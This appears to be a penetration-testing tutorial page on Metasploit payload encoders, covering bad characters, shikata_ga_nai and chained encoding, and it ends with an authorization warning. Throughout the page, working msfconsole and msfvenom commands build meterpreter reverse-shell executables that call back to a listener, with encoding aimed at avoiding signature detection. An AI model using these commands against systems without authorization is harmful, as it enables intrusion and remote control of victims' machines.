Skip to content

🔐 Encoders

Encoders transform payload shellcode into a different format. Their primary purpose is to remove bad characters (bytes that would break the exploit delivery mechanism), but they can also provide a basic level of obfuscation against signature-based detection.

1️⃣ Why Encoders Exist

When an exploit delivers a payload through a buffer overflow or protocol injection, certain bytes may cause problems:

Bad Character Problem
\x00 (null byte) Terminates C strings — the payload gets truncated.
\x0a (newline) Terminates line-based protocol input (e.g., HTTP headers, FTP commands).
\x0d (carriage return) Same as newline in many protocols.
\x20 (space) Can break URL-encoded or command-line payloads.
\xff Problematic in some character set conversions.

An encoder rewrites the payload so that none of the bad characters appear in the final output. A small decoder stub is prepended that reconstructs the original payload in memory at runtime.

Concept

Think of encoding as "packing" the payload. The encoded version avoids bad characters during transit. Once it lands in memory, the decoder stub "unpacks" it back to the original executable shellcode.

2️⃣ Listing Available Encoders

msf6 > show encoders

Encoders
========

   #   Name                            Rank       Description
   -   ----                            ----       -----------
   0   cmd/brace                       low        Bash Brace Expansion Command Encoder
   1   cmd/echo                        good       Echo Command Encoder
   2   generic/eicar                   manual     EICAR Test File Encoder
   3   generic/none                    normal     The "none" Encoder
   4   mipsbe/byte_xori               normal     Byte XORi Encoder
   5   php/base64                      great      PHP Base64 Encoder
   6   x86/shikata_ga_nai             excellent  Polymorphic XOR Additive Feedback Encoder
   7   x86/xor_dynamic                normal     Dynamic key XOR Encoder
   8   x64/xor                        normal     XOR Encoder
   9   x64/xor_dynamic                normal     Dynamic key XOR Encoder
   ...

3️⃣ The Legendary shikata_ga_nai

x86/shikata_ga_nai (Japanese for "nothing can be done about it") is Metasploit's most famous encoder. It uses a polymorphic XOR additive feedback algorithm, meaning:

  • Each encoding produces a different output (polymorphic).
  • The decoder stub itself changes with each encoding.
  • Multiple encoding iterations can be applied to further obfuscate the payload.

Using It in MSFconsole

msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set ENCODER x86/shikata_ga_nai
msf6 > set EnableStageEncoding true
msf6 > exploit

Using It with MSFVenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o payload.exe
- -e x86/shikata_ga_nai — Use the shikata_ga_nai encoder. - -i 5 — Apply 5 encoding iterations.

Note

While shikata_ga_nai was once effective at bypassing antivirus, modern AV/EDR solutions use behavioral analysis and machine learning, not just signatures. Multiple encoding iterations alone are no longer sufficient for evasion against modern security products.

4️⃣ Specifying Bad Characters

When generating payloads, you can tell the encoder which bytes to avoid:

# Avoid null bytes and newlines
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00\x0a\x0d' \
  -f exe -o payload.exe

Metasploit will automatically select the best encoder that can produce output free of the specified bad characters.

# Within MSFconsole
set BadChars "\x00\x0a\x0d\x20"

5️⃣ Common Encoders

Encoder Rank Platform Use Case
x86/shikata_ga_nai Excellent x86 Windows/Linux Best general-purpose x86 encoder. Polymorphic.
x64/xor Normal x64 Simple XOR for 64-bit payloads.
x64/xor_dynamic Normal x64 Dynamic key XOR — slightly better obfuscation.
php/base64 Great PHP Encodes PHP payloads in base64.
cmd/powershell_base64 Excellent Windows Base64-encodes PowerShell commands.
generic/none Normal Any No encoding — useful for debugging.

6️⃣ Multi-Encoding (Chaining Encoders)

You can apply multiple encoders in sequence for deeper obfuscation:

# Using MSFVenom with multiple encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 3 \
  -f raw | \
msfvenom -e x86/xor_dynamic -i 2 \
  -a x86 --platform windows \
  -f exe -o multi_encoded.exe

Tip

Multi-encoding increases payload size and can introduce instability. Test thoroughly in a lab environment before using multi-encoded payloads in an engagement.

7️⃣ Gotchas

Note

Encoders ≠ evasion. Encoding a payload does NOT guarantee it will bypass antivirus. Modern AV/EDR products detect encoded payloads through behavioral analysis, memory scanning, and heuristic analysis — not just static signatures. Use the dedicated evasion/ modules or custom techniques for real evasion (see Firewall & IDS/IPS Evasion).

Note

Architecture matters. x86/shikata_ga_nai only works with x86 payloads. For x64 payloads, use x64/xor or x64/xor_dynamic.

Note

Size increase. Each encoding iteration increases the payload size. If the exploit has a limited buffer size, too many iterations may cause the payload to exceed the available space.

Warning

Encoded payloads are still payloads. Ensure you have authorization before generating or delivering them to any target system.